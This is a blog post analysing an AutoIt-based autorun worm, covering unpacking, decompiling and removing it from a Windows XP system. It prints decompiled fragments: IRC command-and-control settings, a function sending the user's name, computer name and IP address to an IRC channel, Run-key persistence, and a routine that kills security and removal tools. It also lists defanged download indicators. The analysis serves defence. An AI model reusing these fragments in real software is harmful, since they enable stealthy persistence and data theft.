ulilclown@gmail.com/@alwaysreit
I ran across this AutoIt-based worm the other day, and I thought it was super fun to analyze. This post will describe how I decompiled and removed it from an infected Windows XP system.
AutoIt is a freeware Windows scripting language, similar to BASIC. Using AutoIT to create malware is not new, in fact this particular malware has been around since 2010. Microsoft has a decent writeup on it (Worm:Win32/Autorun.AAO). This worm spreads via autorun.inf.
These are the files I found on the infected system under C:\WINDOWS:
1f3d9829908e7e6634818192c75a8b4d *Cysrun.exe
a8e8d5db312691c19552eeef4a4c1931 *Cysusb.exe
5874d14ed6abd50adac4fef08c057fec *Cyswin.exe
These files had Hidden, System, and Read-Only attributes set:
C:\LOLMICHAEL\files>attrib
A SHR C:\LOLMICHAEL\files\Cysrun.exe
A SHR C:\LOLMICHAEL\files\Cysusb.exe
A SHR C:\LOLMICHAEL\files\Cyswin.exe
Easy to fix:
C:\LOLMICHAEL\files>attrib -s -h -r
C:\LOLMICHAEL\files>attrib
A C:\LOLMICHAEL\files\Cysrun.exe
A C:\LOLMICHAEL\files\Cysusb.exe
A C:\LOLMICHAEL\files\Cyswin.exe
Running PEiD reveals that these files are packed with UPX:
C:\LOLMICHAEL>PEiD.exe -r -norm files
files\Cysrun.exe :: UPX 0.89.6 - 1.02 / 1.05 - 2.90 -> Markus & Laszlo [Overlay]
files\Cysusb.exe :: UPX 0.89.6 - 1.02 / 1.05 - 2.90 -> Markus & Laszlo [Overlay]
files\Cyswin.exe :: UPX 0.89.6 - 1.02 / 1.05 - 2.90 -> Markus & Laszlo [Overlay]
Quick loop using UPX.exe to decompress:
C:\LOLMICHAEL\files>for /F %a in ('dir /b') do upx -d -o%a.unpacked %a
C:\LOLMICHAEL\files>dir *.unpacked
02/17/2010 06:42 PM 615,339 Cysrun.exe.unpacked
02/17/2010 06:42 PM 614,671 Cysusb.exe.unpacked
02/17/2010 06:41 PM 632,501 Cyswin.exe.unpacked
3 File(s) 1,862,511 bytes
0 Dir(s) 6,404,280,320 bytes free
Now that we have our executable's unpacked, a quick look at the strings lets us know that it's an AutoIt script:
C:\LOLMICHAEL\files>strings Cysrun.exe.unpacked | find "AutoIt script"
This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.
AutoIt script files (*.au3, *.a3x)
Grabbed an open source AutoIt decompiler called myAut2Exe, and dragged Cyswin.exe into it:
The Au3 files are created for easy viewing with your favorite text editor. Going through the code, I notice a bunch of IRC commands:
$NICK = IniRead(@TempDir & "\Setting2x.Conf", "IRC", "Nick", "Oxyg3n")
$SERVER = IniRead(@TempDir & "\Setting2x.Conf", "IRC", "Server", "irc.freenode.net")
$CHANNEL = IniRead(@TempDir & "\Setting2x.Conf", "IRC", "Channel", "#Oxyg3n")
$CHANPASS = IniRead(@TempDir & "\Setting2x.Conf", "IRC", "Password", "5035")
And here is a function that sends system info to the channel:
Func SYSINFO()
TCPSend($SOCKET, "PRIVMSG " & $CHANNEL & " :# Sistem Raporu // [" & @OSVersion & "] [" & @OSLang & "] [" & @UserName & "] [" & @ComputerName & "] [" & @IPAddress1 & "] " & @CRLF)
EndFunc
Run keys are setup:
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Cyswin", "REG_SZ", @WindowsDir & "\Cyswin.exe")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Cysrun", "REG_SZ", @WindowsDir & "\Cysrun.exe")
This script is able to do a lot more, such as list running processes, execute & download files, and update itself to the newest version. When I tried to remove this malware from an infected system, the first thing I did was run "tasklist.exe", however it just seemed to terminate with no results. I was a little confused. Next I attempted to change the file attributes with "attrib.exe", and the same thing happened. So I went back to my Au3 files and opened up Cysrun.exe and found the following:
Func GETSYS()
If ProcessExists("attrib.exe") Then
ProcessClose("attrib.exe")
EndIf
If ProcessExists("taskmgr.exe") Then
ProcessClose("taskmgr.exe")
EndIf
If ProcessExists("msconfig.exe") Then
ProcessClose("msconfig.exe")
EndIf
If ProcessExists("killbox.exe") Then
ProcessClose("killbox.exe")
EndIf
If ProcessExists("procexp.exe") Then
ProcessClose("procexp.exe")
EndIf
If ProcessExists("combofix.exe") Then
ProcessClose("combofix.exe")
EndIf
If ProcessExists("tasklist.exe") Then
ProcessClose("tasklist.exe")
EndIf
If ProcessExists("taskkill.exe") Then
ProcessClose("taskkill.exe")
EndIf
If WinExists("Pocket Killbox") Then
WinKill("Pocket Killbox")
EndIf
If WinExists("Process Explorer") Then
WinKill("Process Explorer")
EndIf
EndFunc
Very clever! I was able to defeat this easily by renaming those files (obviously).
Here are some network indicators pulled from these files:
hxxp://nsgurup.zzl.org/Setting2x.Conf
hxxp://www.autocombo.com/cys/Cysset.exe
Too bad all malware isn't this easy to analyze. Hopefully more virus writers will choose AutoIt in the future!
No comments:
Post a Comment